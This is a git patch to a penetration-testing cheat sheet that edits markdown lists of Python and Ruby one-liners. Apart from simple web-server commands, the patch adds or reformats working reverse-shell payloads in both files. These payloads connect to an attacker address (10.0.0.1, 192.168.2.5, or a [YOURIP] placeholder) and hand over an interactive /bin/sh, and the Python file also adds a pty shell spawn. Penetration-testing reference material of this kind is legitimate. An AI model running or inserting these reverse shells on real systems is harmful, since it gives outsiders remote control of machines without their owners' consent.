From 2c44bf1168efce0e68a4ab896bcf2bdade4d774b Mon Sep 17 00:00:00 2001 From: webbreacher Date: Thu, 5 Dec 2013 21:51:40 -0500 Subject: [PATCH] Adding content from the Google Docs form submissions --- scripting/python.md | 13 ++++++++++--- scripting/ruby.md | 8 ++++---- 2 files changed, 14 insertions(+), 7 deletions(-) diff --git a/scripting/python.md b/scripting/python.md index 9ef50a7..bc21def 100644 --- a/scripting/python.md +++ b/scripting/python.md @@ -5,9 +5,16 @@ One liners **Start a web server that serves the local files on port 8000, single threaded** ```python -python -m SimpleHTTPServer 8000 -``` +python -m SimpleHTTPServer 8000``` **Python reverse shell from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)** +```python +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'``` -```python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'``` \ No newline at end of file +**Reverse Shell to YOURIP on port 9000** +```python +python -c "import socket,subprocess,os;host=\"[YOURIP]\";port=9000;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"``` + +**Spawn bash shell prompt** +```python +python -c 'import pty; pty.spawn("/bin/bash")'``` \ No newline at end of file diff --git a/scripting/ruby.md b/scripting/ruby.md index b2ab5c5..5e8a5b8 100644 --- a/scripting/ruby.md +++ b/scripting/ruby.md @@ -4,9 +4,9 @@ One liners ----------- **Start a web server that serves the local files from current directory on port 8001** - -```ruby -run -e httpd -- -p 8001 .``` +```ruby +ruby -run -e httpd -- -p 8001 .``` **Reverse /bin/sh shell on port 443 from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)** - -```ruby -rsocket -e'f=TCPSocket.open("192.168.2.5",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'``` +```ruby +ruby -rsocket -e'f=TCPSocket.open("192.168.2.5",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'``` \ No newline at end of file